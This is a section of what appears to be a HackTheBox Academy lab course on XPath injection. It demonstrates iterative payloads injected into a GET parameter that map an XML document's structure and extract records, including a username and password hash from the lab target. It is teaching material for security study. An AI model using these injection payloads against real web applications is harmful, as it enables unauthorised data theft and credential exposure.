Injection Attacks
XPath - Advanced Data Exfiltration
Sometimes, it is impossible to extract the entire XML document at once. Consider a web application that only displays an XPath query's first five results. If we inject our previous payload such that the query returns the entire XML document, we can only exfiltrate the first 5 data points. Thus, we need to modify our payload to manually iterate through the entire XML document to exfiltrate all data.
Advanced Data Exfiltration
For this section, we are working on a slightly modified version of the web application from the previous section that limits the number of results returned so that we cannot exfiltrate the entire XML document at once. To iterate through the XML schema, we must first determine the schema depth. We can achieve this by ensuring the original XPath query returns no results and appending a new query that gives us information about the schema depth. We set the search term in the parameter q to anything that does not return data, for instance, SOMETHINGINVALID. We can then set the parameter f to fullstreetname | /*[1]. This results in the following XPath query:
/a/b/c/[contains(d/text(), 'SOMETHINGINVALID')]/fullstreetname | /*[1]
The subquery /*[1] starts at the document root /, moves one node down the node tree due to the wildcard *, and selects the first child due to the predicate [1]. Thus, this subquery selects the document root's first child, the document root element node. Since the document root element node has multiple child nodes, it is of the data type array in PHP, which we can confirm when analyzing the response. The web application expects a string but receives an array and is thus unable to print the results, resulting in an empty response:

We can now determine the schema depth by iteratively appending an additional /*[1] to the subquery until the behavior of the web application changes. The results look like this (the q parameter remains the same as above for all requests):
Value of the f GET parameter |
Response |
|---|---|
fullstreetname | /*[1] |
Nothing |
fullstreetname | /*[1]/*[1] |
Nothing |
fullstreetname | /*[1]/*[1]/*[1] |
Nothing |
fullstreetname | /*[1]/*[1]/*[1]/*[1] |
01ST ST |
fullstreetname | /*[1]/*[1]/*[1]/*[1]/*[1] |
No Results! |
From the above results, we can deduce that the schema depth for the street data is 4:

This allows us to start exfiltrating data by increasing the position in the last predicate until no more data can be retrieved:
Value of the f GET parameter |
Response |
|---|---|
fullstreetname | /*[1]/*[1]/*[1]/*[1] |
01ST ST |
fullstreetname | /*[1]/*[1]/*[1]/*[2] |
01ST |
fullstreetname | /*[1]/*[1]/*[1]/*[3] |
ST |
fullstreetname | /*[1]/*[1]/*[1]/*[4] |
No Results! |
We successfully exfiltrated information about the first street in the data set. The three values seem to be the long street name, the short street name, and a street type. We can thus fill in some of the placeholders of the XML schema from the previous section. However, remember that we still do not know the exact node names. We are just trying to create an overview of the structure of the XML document:
<a>
<b>
<street>
<fullstreetname>01ST ST</fullstreetname>
<streetname>01ST</streetname>
<street_type>ST</street_type>
</street>
</b>
</a>
We can now extract information about the second street in the data set by incrementing the second to last position predicate in our injected payload like so:
Value of the f GET parameter |
Response |
|---|---|
fullstreetname | /*[1]/*[1]/*[2]/*[1] |
02ND AVE |
fullstreetname | /*[1]/*[1]/*[2]/*[2] |
02ND |
fullstreetname | /*[1]/*[1]/*[2]/*[3] |
AVE |
fullstreetname | /*[1]/*[1]/*[2]/*[4] |
No Results! |
We can do this until we have exfiltrated information about all streets. However, since we are not interested in streets, let us see if the XML document contains other data sets. Incrementing the first position predicate in the payload makes little sense, as this is the document root, and valid XML documents only contain a single document root. However, we can alter the second position predicate to find additional data sets within the XML document. Remember that we need to determine the schema depth again, as it might differ from the depth of the streets data set. To illustrate this, consider the following sample XML document:
<dataset>
<streets>
<street>
<fullstreetname>01ST ST</fullstreetname>
<streetname>01ST</streetname>
<street_type>ST</street_type>
</street>
</streets>
<users>
<group name="users">
<user>
<username>test</username>
<password>test</password>
</user>
</group>
<group name="admins">
<user>
<username>admin</username>
<password>admin</password>
</user>
</group>
</users>
</dataset>
When querying the above XML document, the street nodes are at depth 3: /dataset/streets/street. However, the user nodes are at depth 4: /dataset/users/group/user. Thus, the depth is different, and we must determine it again to exfiltrate the users. We can determine the depth using the following parameter values. Since we are targeting the second data set in the XML document, we need to use /*[1]/*[2] as a starting point:
Value of the f GET parameter |
Response |
|---|---|
fullstreetname | /*[1]/*[2] |
Nothing |
fullstreetname | /*[1]/*[2]/*[1] |
Nothing |
fullstreetname | /*[1]/*[2]/*[1]/*[1] |
Nothing |
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[1] |
htb-stdnt |
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[1]/*[1] |
No Results! |
We can see that the schema depth is 5. Furthermore, we seem to have exfiltrated a username. Just like we did with the streets data before, we can exfiltrate all user data by incrementing the last position predicate:
Value of the f GET parameter |
Response |
|---|---|
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[1] |
htb-stdnt |
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[2] |
295362c2618a05ba3899904a6a3f5bc0 |
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[3] |
HackTheBox Academy Student Account |
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[4] |
No Results! |
From the data we exfiltrated, we seem to have leaked a user object consisting of a username, password hash, and description. We can now iteratively increment the position indices from right to left, just like we did with the street data set to exfiltrate all users.
Note: To exfiltrate an entire XML document, it makes sense to implement a simple script that does the exfiltration for us.
/ 1 spawns left
Questions
Answer the question(s) below to complete this Section and earn cubes!
Click here to spawn the target system!
Target:
Click here to spawn the target system!
+10 Streak pts
Table of Contents
Introduction to Injection Attacks
Introduction to Injection AttacksXPath Injection
Introduction to XPath Injection XPath - Authentication Bypass XPath - Data Exfiltration XPath - Advanced Data Exfiltration XPath - Blind Exploitation XPath Injection Prevention & ToolsLDAP Injection
Introduction to LDAP Injection LDAP - Authentication Bypass LDAP - Data Exfiltration & Blind Exploitation LDAP Injection PreventionHTML Injection in PDF Generators
Introduction to PDF Generation Vulnerabilities Exploitation of PDF Generation Vulnerabilities Prevention of PDF Generation VulnerabilitiesSkills Assessment
Skills AssessmentMy Workstation
OFFLINE
/ 1 spawns left